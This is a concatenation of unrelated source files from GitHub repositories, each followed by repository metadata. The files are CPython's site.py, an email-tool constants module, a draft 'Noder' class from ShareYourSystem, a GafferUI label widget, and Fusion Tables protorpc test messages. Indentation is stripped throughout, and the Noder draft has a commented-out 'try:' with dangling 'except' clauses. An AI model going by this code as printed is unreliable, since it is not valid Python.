# foo package configuration
foo
bar
bletch
and bar.pth contains:
# bar package configuration
bar
Then the following directories are added to sys.path, in this order:
/usr/local/lib/python2.5/site-packages/bar
/usr/local/lib/python2.5/site-packages/foo
Note that bletch is omitted because it doesn't exist; bar precedes foo
because bar.pth comes alphabetically before foo.pth; and spam is
omitted because it is not mentioned in either path configuration file.
The readline module is also automatically configured to enable
completion for systems that support it. This can be overridden in
sitecustomize, usercustomize or PYTHONSTARTUP. Starting Python in
isolated mode (-I) disables automatic readline configuration.
After these operations, an attempt is made to import a module
named sitecustomize, which can perform arbitrary additional
site-specific customizations. If this import fails with an
ImportError exception, it is silently ignored.
"""
import sys
import os
import builtins
import _sitebuiltins
# Prefixes for site-packages; add additional prefixes like /usr/local here
PREFIXES = [sys.prefix, sys.exec_prefix]
# Enable per user site-packages directory
# set it to False to disable the feature or True to force the feature
ENABLE_USER_SITE = None
# for distutils.commands.install
# These values are initialized by the getuserbase() and getusersitepackages()
# functions, through the main() function when Python starts.
USER_SITE = None
USER_BASE = None
def makepath(*paths):
dir = os.path.join(*paths)
try:
dir = os.path.abspath(dir)
except OSError:
pass
return dir, os.path.normcase(dir)
def abs_paths():
"""Set all module __file__ and __cached__ attributes to an absolute path"""
for m in set(sys.modules.values()):
if (getattr(getattr(m, '__loader__', None), '__module__', None) not in
('_frozen_importlib', '_frozen_importlib_external')):
continue # don't mess with a PEP 302-supplied __file__
try:
m.__file__ = os.path.abspath(m.__file__)
except (AttributeError, OSError, TypeError):
pass
try:
m.__cached__ = os.path.abspath(m.__cached__)
except (AttributeError, OSError, TypeError):
pass
def removeduppaths():
""" Remove duplicate entries from sys.path along with making them
absolute"""
# This ensures that the initial path provided by the interpreter contains
# only absolute pathnames, even if we're running from the build directory.
L = []
known_paths = set()
for dir in sys.path:
# Filter out duplicate paths (on case-insensitive file systems also
# if they only differ in case); turn relative paths into absolute
# paths.
dir, dircase = makepath(dir)
if dircase not in known_paths:
L.append(dir)
known_paths.add(dircase)
sys.path[:] = L
return known_paths
def _init_pathinfo():
"""Return a set containing all existing file system items from sys.path."""
d = set()
for item in sys.path:
try:
if os.path.exists(item):
_, itemcase = makepath(item)
d.add(itemcase)
except TypeError:
continue
return d
def addpackage(sitedir, name, known_paths):
"""Process a .pth file within the site-packages directory:
For each line in the file, either combine it with sitedir to a path
and add that to known_paths, or execute it if it starts with 'import '.
"""
if known_paths is None:
known_paths = _init_pathinfo()
reset = True
else:
reset = False
fullname = os.path.join(sitedir, name)
try:
f = open(fullname, "r")
except OSError:
return
with f:
for n, line in enumerate(f):
if line.startswith("#"):
continue
try:
if line.startswith(("import ", "import\t")):
exec(line)
continue
line = line.rstrip()
dir, dircase = makepath(sitedir, line)
if not dircase in known_paths and os.path.exists(dir):
sys.path.append(dir)
known_paths.add(dircase)
except Exception:
print("Error processing line {:d} of {}:\n".format(n+1, fullname),
file=sys.stderr)
import traceback
for record in traceback.format_exception(*sys.exc_info()):
for line in record.splitlines():
print(' '+line, file=sys.stderr)
print("\nRemainder of file ignored", file=sys.stderr)
break
if reset:
known_paths = None
return known_paths
def addsitedir(sitedir, known_paths=None):
"""Add 'sitedir' argument to sys.path if missing and handle .pth files in
'sitedir'"""
if known_paths is None:
known_paths = _init_pathinfo()
reset = True
else:
reset = False
sitedir, sitedircase = makepath(sitedir)
if not sitedircase in known_paths:
sys.path.append(sitedir) # Add path component
known_paths.add(sitedircase)
try:
names = os.listdir(sitedir)
except OSError:
return
names = [name for name in names if name.endswith(".pth")]
for name in sorted(names):
addpackage(sitedir, name, known_paths)
if reset:
known_paths = None
return known_paths
def check_enableusersite():
"""Check if user site directory is safe for inclusion
The function tests for the command line flag (including environment var),
process uid/gid equal to effective uid/gid.
None: Disabled for security reasons
False: Disabled by user (command line option)
True: Safe and enabled
"""
if sys.flags.no_user_site:
return False
if hasattr(os, "getuid") and hasattr(os, "geteuid"):
# check process uid == effective uid
if os.geteuid() != os.getuid():
return None
if hasattr(os, "getgid") and hasattr(os, "getegid"):
# check process gid == effective gid
if os.getegid() != os.getgid():
return None
return True
# NOTE: sysconfig and it's dependencies are relatively large but site module
# needs very limited part of them.
# To speedup startup time, we have copy of them.
#
# See https://bugs.python.org/issue29585
# Copy of sysconfig._getuserbase()
def _getuserbase():
env_base = os.environ.get("PYTHONUSERBASE", None)
if env_base:
return env_base
def joinuser(*args):
return os.path.expanduser(os.path.join(*args))
if os.name == "nt":
base = os.environ.get("APPDATA") or "~"
return joinuser(base, "Python")
if sys.platform == "darwin" and sys._framework:
return joinuser("~", "Library", sys._framework,
"%d.%d" % sys.version_info[:2])
return joinuser("~", ".local")
# Same to sysconfig.get_path('purelib', os.name+'_user')
def _get_path(userbase):
version = sys.version_info
if os.name == 'nt':
return f'{userbase}\\Python{version[0]}{version[1]}\\site-packages'
if sys.platform == 'darwin' and sys._framework:
return f'{userbase}/lib/python/site-packages'
return f'{userbase}/lib/python{version[0]}.{version[1]}/site-packages'
def getuserbase():
"""Returns the `user base` directory path.
The `user base` directory can be used to store data. If the global
variable ``USER_BASE`` is not initialized yet, this function will also set
it.
"""
global USER_BASE
if USER_BASE is None:
USER_BASE = _getuserbase()
return USER_BASE
def getusersitepackages():
"""Returns the user-specific site-packages directory path.
If the global variable ``USER_SITE`` is not initialized yet, this
function will also set it.
"""
global USER_SITE
userbase = getuserbase() # this will also set USER_BASE
if USER_SITE is None:
USER_SITE = _get_path(userbase)
return USER_SITE
def addusersitepackages(known_paths):
"""Add a per user site-package to sys.path
Each user has its own python directory with site-packages in the
home directory.
"""
# get the per user site-package path
# this call will also make sure USER_BASE and USER_SITE are set
user_site = getusersitepackages()
if ENABLE_USER_SITE and os.path.isdir(user_site):
addsitedir(user_site, known_paths)
return known_paths
def getsitepackages(prefixes=None):
"""Returns a list containing all global site-packages directories.
For each directory present in ``prefixes`` (or the global ``PREFIXES``),
this function will find its `site-packages` subdirectory depending on the
system environment, and will return a list of full paths.
"""
sitepackages = []
seen = set()
if prefixes is None:
prefixes = PREFIXES
for prefix in prefixes:
if not prefix or prefix in seen:
continue
seen.add(prefix)
if os.sep == '/':
sitepackages.append(os.path.join(prefix, "lib",
"python%d.%d" % sys.version_info[:2],
"site-packages"))
else:
sitepackages.append(prefix)
sitepackages.append(os.path.join(prefix, "lib", "site-packages"))
return sitepackages
def addsitepackages(known_paths, prefixes=None):
"""Add site-packages to sys.path"""
for sitedir in getsitepackages(prefixes):
if os.path.isdir(sitedir):
addsitedir(sitedir, known_paths)
return known_paths
def setquit():
"""Define new builtins 'quit' and 'exit'.
These are objects which make the interpreter exit when called.
The repr of each object contains a hint at how it works.
"""
if os.sep == '\\':
eof = 'Ctrl-Z plus Return'
else:
eof = 'Ctrl-D (i.e. EOF)'
builtins.quit = _sitebuiltins.Quitter('quit', eof)
builtins.exit = _sitebuiltins.Quitter('exit', eof)
def setcopyright():
"""Set 'copyright' and 'credits' in builtins"""
builtins.copyright = _sitebuiltins._Printer("copyright", sys.copyright)
if sys.platform[:4] == 'java':
builtins.credits = _sitebuiltins._Printer(
"credits",
"Jython is maintained by the Jython developers (www.jython.org).")
else:
builtins.credits = _sitebuiltins._Printer("credits", """\
Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands
for supporting Python development. See www.python.org for more information.""")
files, dirs = [], []
# Not all modules are required to have a __file__ attribute. See
# PEP 420 for more details.
if hasattr(os, '__file__'):
here = os.path.dirname(os.__file__)
files.extend(["LICENSE.txt", "LICENSE"])
dirs.extend([os.path.join(here, os.pardir), here, os.curdir])
builtins.license = _sitebuiltins._Printer(
"license",
"See https://www.python.org/psf/license/",
files, dirs)
def sethelper():
builtins.help = _sitebuiltins._Helper()
def enablerlcompleter():
"""Enable default readline configuration on interactive prompts, by
registering a sys.__interactivehook__.
If the readline module can be imported, the hook will set the Tab key
as completion key and register ~/.python_history as history file.
This can be overridden in the sitecustomize or usercustomize module,
or in a PYTHONSTARTUP file.
"""
def register_readline():
import atexit
try:
import readline
import rlcompleter
except ImportError:
return
# Reading the initialization (config) file may not be enough to set a
# completion key, so we set one first and then read the file.
readline_doc = getattr(readline, '__doc__', '')
if readline_doc is not None and 'libedit' in readline_doc:
readline.parse_and_bind('bind ^I rl_complete')
else:
readline.parse_and_bind('tab: complete')
try:
readline.read_init_file()
except OSError:
# An OSError here could have many causes, but the most likely one
# is that there's no .inputrc file (or .editrc file in the case of
# Mac OS X + libedit) in the expected location. In that case, we
# want to ignore the exception.
pass
if readline.get_current_history_length() == 0:
# If no history was loaded, default to .python_history.
# The guard is necessary to avoid doubling history size at
# each interpreter exit when readline was already configured
# through a PYTHONSTARTUP hook, see:
# http://bugs.python.org/issue5845#msg198636
history = os.path.join(os.path.expanduser('~'),
'.python_history')
try:
readline.read_history_file(history)
except OSError:
pass
def write_history():
try:
readline.write_history_file(history)
except (FileNotFoundError, PermissionError):
# home directory does not exist or is not writable
# https://bugs.python.org/issue19891
pass
atexit.register(write_history)
sys.__interactivehook__ = register_readline
def venv(known_paths):
global PREFIXES, ENABLE_USER_SITE
env = os.environ
if sys.platform == 'darwin' and '__PYVENV_LAUNCHER__' in env:
executable = sys._base_executable = os.environ['__PYVENV_LAUNCHER__']
elif sys.platform == 'win32' and '__PYVENV_LAUNCHER__' in env:
executable = sys.executable
import _winapi
sys._base_executable = _winapi.GetModuleFileName(0)
# bpo-35873: Clear the environment variable to avoid it being
# inherited by child processes.
del os.environ['__PYVENV_LAUNCHER__']
else:
executable = sys.executable
exe_dir, _ = os.path.split(os.path.abspath(executable))
site_prefix = os.path.dirname(exe_dir)
sys._home = None
conf_basename = 'pyvenv.cfg'
candidate_confs = [
conffile for conffile in (
os.path.join(exe_dir, conf_basename),
os.path.join(site_prefix, conf_basename)
)
if os.path.isfile(conffile)
]
if candidate_confs:
virtual_conf = candidate_confs[0]
system_site = "true"
# Issue 25185: Use UTF-8, as that's what the venv module uses when
# writing the file.
with open(virtual_conf, encoding='utf-8') as f:
for line in f:
if '=' in line:
key, _, value = line.partition('=')
key = key.strip().lower()
value = value.strip()
if key == 'include-system-site-packages':
system_site = value.lower()
elif key == 'home':
sys._home = value
sys.prefix = sys.exec_prefix = site_prefix
# Doing this here ensures venv takes precedence over user-site
addsitepackages(known_paths, [sys.prefix])
# addsitepackages will process site_prefix again if its in PREFIXES,
# but that's ok; known_paths will prevent anything being added twice
if system_site == "true":
PREFIXES.insert(0, sys.prefix)
else:
PREFIXES = [sys.prefix]
ENABLE_USER_SITE = False
return known_paths
def execsitecustomize():
"""Run custom site specific code, if available."""
try:
try:
import sitecustomize
except ImportError as exc:
if exc.name == 'sitecustomize':
pass
else:
raise
except Exception as err:
if sys.flags.verbose:
sys.excepthook(*sys.exc_info())
else:
sys.stderr.write(
"Error in sitecustomize; set PYTHONVERBOSE for traceback:\n"
"%s: %s\n" %
(err.__class__.__name__, err))
def execusercustomize():
"""Run custom user specific code, if available."""
try:
try:
import usercustomize
except ImportError as exc:
if exc.name == 'usercustomize':
pass
else:
raise
except Exception as err:
if sys.flags.verbose:
sys.excepthook(*sys.exc_info())
else:
sys.stderr.write(
"Error in usercustomize; set PYTHONVERBOSE for traceback:\n"
"%s: %s\n" %
(err.__class__.__name__, err))
def main():
"""Add standard site-specific directories to the module search path.
This function is called automatically when this module is imported,
unless the python interpreter was started with the -S flag.
"""
global ENABLE_USER_SITE
orig_path = sys.path[:]
known_paths = removeduppaths()
if orig_path != sys.path:
# removeduppaths() might make sys.path absolute.
# fix __file__ and __cached__ of already imported modules too.
abs_paths()
known_paths = venv(known_paths)
if ENABLE_USER_SITE is None:
ENABLE_USER_SITE = check_enableusersite()
known_paths = addusersitepackages(known_paths)
known_paths = addsitepackages(known_paths)
setquit()
setcopyright()
sethelper()
if not sys.flags.isolated:
enablerlcompleter()
execsitecustomize()
if ENABLE_USER_SITE:
execusercustomize()
# Prevent extending of sys.path when python was started with -S and
# site is imported later.
if not sys.flags.no_site:
main()
def _script():
help = """\
%s [--user-base] [--user-site]
Without arguments print some useful information
With arguments print the value of USER_BASE and/or USER_SITE separated
by '%s'.
Exit codes with --user-base or --user-site:
0 - user site directory is enabled
1 - user site directory is disabled by user
2 - uses site directory is disabled by super user
or for security reasons
>2 - unknown error
"""
args = sys.argv[1:]
if not args:
user_base = getuserbase()
user_site = getusersitepackages()
print("sys.path = [")
for dir in sys.path:
print(" %r," % (dir,))
print("]")
print("USER_BASE: %r (%s)" % (user_base,
"exists" if os.path.isdir(user_base) else "doesn't exist"))
print("USER_SITE: %r (%s)" % (user_site,
"exists" if os.path.isdir(user_site) else "doesn't exist"))
print("ENABLE_USER_SITE: %r" % ENABLE_USER_SITE)
sys.exit(0)
buffer = []
if '--user-base' in args:
buffer.append(USER_BASE)
if '--user-site' in args:
buffer.append(USER_SITE)
if buffer:
print(os.pathsep.join(buffer))
if ENABLE_USER_SITE:
sys.exit(0)
elif ENABLE_USER_SITE is False:
sys.exit(1)
elif ENABLE_USER_SITE is None:
sys.exit(2)
else:
sys.exit(3)
else:
import textwrap
print(textwrap.dedent(help % (sys.argv[0], os.pathsep)))
sys.exit(10)
if __name__ == '__main__':
_script()
|
{
"content_hash": "40a97e5e4f9a50e5c9fbda232b47fe7a",
"timestamp": "",
"source": "github",
"line_count": 640,
"max_line_length": 84,
"avg_line_length": 33.8265625,
"alnum_prop": 0.6160561688761605,
"repo_name": "zooba/PTVS",
"id": "ad1146332b0ab7b65df640069bbeb4b6494bbad9",
"size": "21649",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "Python/Product/Miniconda/Miniconda3-x64/Lib/site.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ASP",
"bytes": "109"
},
{
"name": "Batchfile",
"bytes": "10898"
},
{
"name": "C",
"bytes": "23236"
},
{
"name": "C#",
"bytes": "12390821"
},
{
"name": "C++",
"bytes": "209386"
},
{
"name": "CSS",
"bytes": "7025"
},
{
"name": "HTML",
"bytes": "34251"
},
{
"name": "JavaScript",
"bytes": "87257"
},
{
"name": "PowerShell",
"bytes": "25220"
},
{
"name": "Python",
"bytes": "888412"
},
{
"name": "Rich Text Format",
"bytes": "260880"
},
{
"name": "Smarty",
"bytes": "8156"
},
{
"name": "Tcl",
"bytes": "24968"
}
],
"symlink_target": ""
}
|
EMAILS = 'Emails'
RECIPIENTS = 'Recipients'
# Special variable names
BODY = 'email_body'
DATE = 'email_date'
FROM = 'email_from'
REPLY_TO = 'email_reply_to'
SUBJECT = 'email_subject'
PREFIX = '__prefix__'
# Recipient column names
HIGHLIGHT = 'highlight'
|
{
"content_hash": "adaae83d1722894ad94ec0948a84ca6d",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 27,
"avg_line_length": 19.692307692307693,
"alnum_prop": 0.69921875,
"repo_name": "WhiteHalmos/emailer",
"id": "205fc4ba66bbd06527f1715eafdf153d92d42f52",
"size": "270",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "emailer/name.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "546"
},
{
"name": "Python",
"bytes": "58411"
}
],
"symlink_target": ""
}
|
"""
<DefineSource>
@Date : Fri Nov 14 13:20:38 2014 \n
@Author : Erwan Ledoux \n\n
</DefineSource>
A Noder defines Child ordered dicts with <DoStr> as KeyStr.
The items inside are automatically setted with Noded<DoStr><TypeStr> and have
a Pointer to the parent InstanceVariable. This is the beginning for buiding high
arborescent and (possibly circular) structures of objects.
"""
#<DefineAugmentation>
import ShareYourSystem as SYS
BaseModuleStr="ShareYourSystem.Applyiers.Weaver"
DecorationModuleStr="ShareYourSystem.Standards.Classors.Classer"
SYS.setSubModule(globals())
#</DefineAugmentation>
#<ImportSpecificModules>
import collections
from ShareYourSystem.Standards.Itemizers import Pather
from ShareYourSystem.Functers import Imitater
#</ImportSpecificModules>
#<DefineLocals>
NodingPrefixGetStr='<'
NodingSuffixGetStr='>'
#</DefineLocals>
#<DefineClass>
@DecorationClass()
class NoderClass(BaseClass):
#Definition
RepresentingKeyStrsList=[
'NodingCollectionStr',
#'NodedCollectionOrderedDict',
'NodedPrefixStr',
'NodedKeyStrKeyStr',
'NodePointDeriveNoder',
'NodedInt'
]
def default_init(self,
_NodingCollectionStr="",
_NodedCollectionOrderedDict=None,
_NodedPrefixStr="",
_NodedKeyStrKeyStr="" ,
_NodePointDeriveNoder=None,
_NodedInt=-1,
**_KwargVariablesDict
):
#Call the parent init method
BaseClass.__init__(self,**_KwargVariablesDict)
#@Argumenter.ArgumenterClass()
def do_node(self,**_KwargVariablesDict):
#debug
'''
self.debug(("self.",self,['NodingCollectionStr']))
'''
#Get the NodedStr
if self.NodingCollectionStr!="":
#set the NodedPrefixStr
self.NodedPrefixStr='Noded'+self.NodingCollectionStr
#set the Noded OrderedDict and KeyStr
NodedCollectionOrderedSetTagStr=self.NodedPrefixStr+'CollectionOrderedDict'
#self.NodedKeyStrKeyStr=self.NodedPrefixStr+'KeyStr'
try:
self.NodedCollectionOrderedDict=getattr(self,NodedCollectionOrderedSetTagStr)
except AttributeError:
self.__setattr__(NodedCollectionOrderedSetTagStr,collections.OrderedDict())
self.NodedCollectionOrderedDict=getattr(self,NodedCollectionOrderedSetTagStr)
'''
try:
self.NodedKeyStr=getattr(self,self.NodedKeyStrKeyStr)
except AttributeError:
self.__setattr__(self.NodedKeyStrKeyStr,"")
self.NodedKeyStr=getattr(self,self.NodedKeyStrKeyStr)
'''
#debug
'''
self.debug(('self.',self,['NodedPrefixStr','NodedCollectionOrderedDict',]))
'''
#If this is a set of a tree of nodes then also init the nodifying attributes
if 'IsNoderBool' not in _KwargVariablesDict or _KwargVariablesDict['IsNoderBool']:
#NodePointDeriveNoderKeyStr=self.NodedPrefixStr+'ParentPointer'
#NodedIntKeyStr=self.NodedPrefixStr+'Int'
#NodedPathStrKeyStr=self.NodedPrefixStr+'PathStr'
#NodedGrandParentPointersListKeyStr=self.NodedPrefixStr+'GrandParentPointersList'
#try:
self.NodedInt=getattr(self,NodedIntKeyStr)
except AttributeError:
self.__setattr__(NodedIntKeyStr,-1)
self.NodedInt=getattr(self,NodedIntKeyStr)
try:
self.NodePointDeriveNoder=getattr(self,NodePointDeriveNoderKeyStr)
except AttributeError:
self.__setattr__(NodePointDeriveNoderKeyStr,None)
self.NodePointDeriveNoder=getattr(self,NodePointDeriveNoderKeyStr)
#debug
'''
self.debug(
[
('vars ',vars(),['NodePointDeriveNoderKeyStr']),
('self.',self,[NodePointDeriveNoderKeyStr])
]
)
'''
#Return self
#return self
#<Hook>@Hooker.HookerClass(**{'HookingAfterVariablesList':[BaseClass.get]})
@Imitater.ImitaterClass()
def get(self):
#debug
'''
self.debug(("self.",self,['GettingKeyVariable']))
'''
#Definition
OutputDict={'HookingIsBool':True}
#Appending set
if self.GettingKeyVariable.startswith(NodingPrefixGetStr):
#Definition the SplittedStrsList
SplittedStrsList=self.GettingKeyVariable.split(NodingSuffixGetStr)
#Definition the NodingCollectionStr
NodingCollectionStr=NodingPrefixGetStr.join(
SplittedStrsList[0].split(NodingPrefixGetStr)[1:])
#debug
'''
self.debug(
[
'NodingCollectionStr is '+NodingCollectionStr,
'We are going to node'
]
)
'''
#Nodify
self.node(NodingCollectionStr,**{'IsNoderBool':False})
#Definition the KeyStr
KeyStr=NodingSuffixGetStr.join(SplittedStrsList[1:])
#debug
'''
self.debug(
[
'node is done',
'KeyStr is '+KeyStr
]
)
'''
#Get with a digited KeyStr case
if KeyStr.isdigit():
#Definition the GettingInt
GettingInt=(int)(KeyStr)
#Check if the size is ok
if GettingInt<len(self.NodedCollectionOrderedDict):
#Get the GettedVariable
self.GettedValueVariable=SYS.get(self.NodedCollectionOrderedDict,'values',GettingInt)
#Return
OutputDict['HookingIsBool']=False
#<Hook>return OutputDict
#Get in the ValueVariablesList
elif KeyStr=="":
#Get the GettedVariable
self.GettedValueVariable=self.NodedCollectionOrderedDict.values()
#Return
OutputDict['HookingIsBool']=False
#<Hook>return OutputDict
elif KeyStr in self.NodedCollectionOrderedDict:
#Get the GettedVariable
self.GettedValueVariable=self.NodedCollectionOrderedDict[KeyStr]
#Return
OutputDict['HookingIsBool']=False
#<Hook>return OutputDict
#Call the parent get method
if OutputDict['HookingIsBool']:
BaseClass.get(self)
#debug
'''
self.debug('End of the method')
'''
#<Hook>@Hooker.HookerClass(**{'HookingAfterVariablesList':[BaseClass.set]})
@Imitater.ImitaterClass()
def set(self):
""" """
#debug
'''
self.debug('Start of the method')
'''
#Definition
OutputDict={'HookingIsBool':True}
#Appending set
if self.SettingKeyVariable.startswith(NodingPrefixGetStr):
#Definition the SplittedStrsList
SplittedStrsList=self.SettingKeyVariable.split(NodingSuffixGetStr)
#Definition the NodingCollectionStr
NodingCollectionStr=NodingPrefixGetStr.join(
SplittedStrsList[0].split(NodingPrefixGetStr)[1:])
#Check if it is an append of Nodes
IsNoderBool='NoderClass' in map(
lambda __Class:
__Class.__name__,
type(self.SettingValueVariable).__mro__
)
#debug
'''
self.debug(('vars ',vars(),['NodingCollectionStr','IsNoderBool']))
'''
#Nodify
self.node(NodingCollectionStr,**{'IsNoderBool':IsNoderBool})
#Definition the KeyStr
SettedKeyStr=NodingSuffixGetStr.join(SplittedStrsList[1:])
#debug
'''
self.debug('KeyStr is '+KeyStr)
'''
#Append (or set if it is already in)
Pather.setWithPathVariableAndKeyVariable(
self.NodedCollectionOrderedDict,
Pather.PathPrefixStr+SettedKeyStr,
self.SettingValueVariable
)
#If it is an object
if IsNoderBool:
#Int and Set Child attributes
self.SettingValueVariable.__setattr__(self.NodedPrefixStr+'Int',len(self.NodedCollectionOrderedDict)-1)
NodedStrKeyStr=self.NodedPrefixStr+'KeyStr'
self.SettingValueVariable.__setitem__(NodedStrKeyStr,SettedKeyStr)
self.SettingValueVariable.__setattr__(self.NodedPrefixStr+'ParentPointer',self)
#Init GrandChild attributes
'''
self.SettingValueVariable.__setattr__(self.NodedPrefixStr+'PathStr',"")
self.SettingValueVariable.__setattr__(self.NodedPrefixStr+'GrandParentPointersList',[])
'''
#Return
OutputDict['HookingIsBool']=False
#<Hook>return OutputDict
#Call the parent get method
if OutputDict['HookingIsBool']:
BaseClass.set(self)
#</DefineClass>
|
{
"content_hash": "7bc6fcd8104d2c9fccd7ef806c65a29e",
"timestamp": "",
"source": "github",
"line_count": 302,
"max_line_length": 107,
"avg_line_length": 25.5,
"alnum_prop": 0.7093883911180366,
"repo_name": "Ledoux/ShareYourSystem",
"id": "e08be7a33bb3e2b51dd9c0036dad1eb404fe6d7f",
"size": "7725",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Pythonlogy/ShareYourSystem/Standards/Itemizers/Teamer/draft/__init__ copy 2.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "ApacheConf",
"bytes": "86"
},
{
"name": "C++",
"bytes": "4244220"
},
{
"name": "CSS",
"bytes": "142769"
},
{
"name": "CoffeeScript",
"bytes": "37331"
},
{
"name": "HTML",
"bytes": "36211676"
},
{
"name": "JavaScript",
"bytes": "2147968"
},
{
"name": "Jupyter Notebook",
"bytes": "7930602"
},
{
"name": "Makefile",
"bytes": "6362"
},
{
"name": "PHP",
"bytes": "11096341"
},
{
"name": "Python",
"bytes": "5700092"
},
{
"name": "Ruby",
"bytes": "60"
},
{
"name": "Scala",
"bytes": "2412"
},
{
"name": "Shell",
"bytes": "2525"
},
{
"name": "Swift",
"bytes": "154"
},
{
"name": "TeX",
"bytes": "2556"
},
{
"name": "XSLT",
"bytes": "20993"
}
],
"symlink_target": ""
}
|
import IECore
import Gaffer
import GafferUI
## The NameLabel class displays a label which is kept in sync with the name of
# a particular GraphComponent. The label acts as a drag source for dragging the
# GraphComponent to another widget.
class NameLabel( GafferUI.Label ) :
def __init__( self, graphComponent, horizontalAlignment=GafferUI.Label.HorizontalAlignment.Left, verticalAlignment=GafferUI.Label.VerticalAlignment.Center,**kw ) :
GafferUI.Label.__init__( self, "", horizontalAlignment, verticalAlignment, **kw )
self.setGraphComponent( graphComponent )
self.__buttonPressConnection = self.buttonPressSignal().connect( Gaffer.WeakMethod( self.__buttonPress ) )
self.__dragBeginConnection = self.dragBeginSignal().connect( Gaffer.WeakMethod( self.__dragBegin ) )
self.__dragEndConnection = self.dragEndSignal().connect( Gaffer.WeakMethod( self.__dragEnd ) )
## Calling setText() disables the name tracking behaviour.
def setText( self, text ) :
GafferUI.Label.setText( self, text )
self.__nameChangedConnection = None
def setGraphComponent( self, graphComponent ) :
self.__graphComponent = graphComponent
if self.__graphComponent is not None :
self.__nameChangedConnection = self.__graphComponent.nameChangedSignal().connect( Gaffer.WeakMethod( self.__setText ) )
else :
self.__nameChangedConnection = None
self.__setText()
def getGraphComponent( self ) :
return self.__graphComponent
def __setText( self, *unwantedArgs ) :
if self.getGraphComponent() is not None :
GafferUI.Label.setText( self, IECore.CamelCase.toSpaced( self.__graphComponent.getName() ) )
def __buttonPress( self, widget, event ) :
return self.getGraphComponent() is not None and event.buttons & ( event.Buttons.Left | event.Buttons.Middle )
def __dragBegin( self, widget, event ) :
if event.buttons & ( event.Buttons.Left | event.Buttons.Middle ) :
GafferUI.Pointer.setFromFile( "nodes.png" )
return self.getGraphComponent()
return None
def __dragEnd( self, widget, event ) :
GafferUI.Pointer.set( None )
|
{
"content_hash": "452ca71dbf8d062e0d4b7999e876d039",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 164,
"avg_line_length": 34.21311475409836,
"alnum_prop": 0.7307139434595112,
"repo_name": "DoubleNegativeVisualEffects/gaffer",
"id": "86756ceb1d92b2f0bbc3a3580a30f6407f3e5573",
"size": "3904",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "python/GafferUI/NameLabel.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
"""Generated message classes for fusiontables version v1.
API for working with Fusion Tables data.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from protorpc import messages
package = 'fusiontables'
class Column(messages.Message):
"""Specifies the id, name and type of a column in a table.
Messages:
BaseColumnValue: Optional identifier of the base column. If present, this
column is derived from the specified base column.
Fields:
baseColumn: Optional identifier of the base column. If present, this
column is derived from the specified base column.
columnId: Identifier for the column.
description: Optional column description.
graph_predicate: Optional column predicate. Used to map table to
graph data model (subject,predicate,object) See
http://www.w3.org/TR/2014/REC-
rdf11-concepts-20140225/#data-model
kind: Type name: a template for an individual column.
name: Required name of the column.
type: Required type of the column.
"""
class BaseColumnValue(messages.Message):
"""Optional identifier of the base column. If present, this column is
derived from the specified base column.
Fields:
columnId: The id of the column in the base table from which
this column is derived.
tableIndex: Offset to the entry in the list of base tables
in the table definition.
"""
columnId = messages.IntegerField(1, variant=messages.Variant.INT32)
tableIndex = messages.IntegerField(2, variant=messages.Variant.INT32)
baseColumn = messages.MessageField('BaseColumnValue', 1)
columnId = messages.IntegerField(2, variant=messages.Variant.INT32)
description = messages.StringField(3)
graph_predicate = messages.StringField(4)
kind = messages.StringField(5, default=u'fusiontables#column')
name = messages.StringField(6)
type = messages.StringField(7)
class ColumnList(messages.Message):
"""Represents a list of columns in a table.
Fields:
items: List of all requested columns.
kind: Type name: a list of all columns.
nextPageToken: Token used to access the next page of this
result. No token is displayed if there are no more pages left.
totalItems: Total number of columns for the table.
"""
items = messages.MessageField('Column', 1, repeated=True)
kind = messages.StringField(2, default=u'fusiontables#columnList')
nextPageToken = messages.StringField(3)
totalItems = messages.IntegerField(4, variant=messages.Variant.INT32)
class FusiontablesColumnListRequest(messages.Message):
"""A FusiontablesColumnListRequest object.
Fields:
maxResults: Maximum number of columns to return. Optional. Default is 5.
pageToken: Continuation token specifying which result page to return.
Optional.
tableId: Table whose columns are being listed.
"""
maxResults = messages.IntegerField(1, variant=messages.Variant.UINT32)
pageToken = messages.StringField(2)
tableId = messages.StringField(3, required=True)
class FusiontablesColumnListAlternateRequest(messages.Message):
"""A FusiontablesColumnListRequest object.
Fields:
pageSize: Maximum number of columns to return. Optional. Default is 5.
pageToken: Continuation token specifying which result page to return.
Optional.
tableId: Table whose columns are being listed.
"""
pageSize = messages.IntegerField(1, variant=messages.Variant.UINT32)
pageToken = messages.StringField(2)
tableId = messages.StringField(3, required=True)
class ColumnListAlternate(messages.Message):
"""Represents a list of columns in a table.
Fields:
items: List of all requested columns.
kind: Type name: a list of all columns.
nextPageToken: Token used to access the next page of this
result. No token is displayed if there are no more pages left.
totalItems: Total number of columns for the table.
"""
columns = messages.MessageField('Column', 1, repeated=True)
kind = messages.StringField(2, default=u'fusiontables#columnList')
nextPageToken = messages.StringField(3)
totalItems = messages.IntegerField(4, variant=messages.Variant.INT32)
|
{
"content_hash": "10addf39cca841a387b7e352551a61d4",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 79,
"avg_line_length": 34.0078125,
"alnum_prop": 0.7093958189754193,
"repo_name": "wemanuel/smry",
"id": "fd727a0aa25ef746f9616d50053d7c546b30e739",
"size": "4353",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "smry/server-auth/ls/google-cloud-sdk/platform/gsutil/third_party/apitools/apitools/base/py/testing/testclient/fusiontables_v1_messages.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3990"
},
{
"name": "Groff",
"bytes": "1221174"
},
{
"name": "HTML",
"bytes": "1873470"
},
{
"name": "JavaScript",
"bytes": "2192"
},
{
"name": "Makefile",
"bytes": "6032"
},
{
"name": "PHP",
"bytes": "16660"
},
{
"name": "Python",
"bytes": "47139164"
},
{
"name": "Shell",
"bytes": "37102"
},
{
"name": "SourcePawn",
"bytes": "1160"
}
],
"symlink_target": ""
}
|
import pandas as pd
import pytz
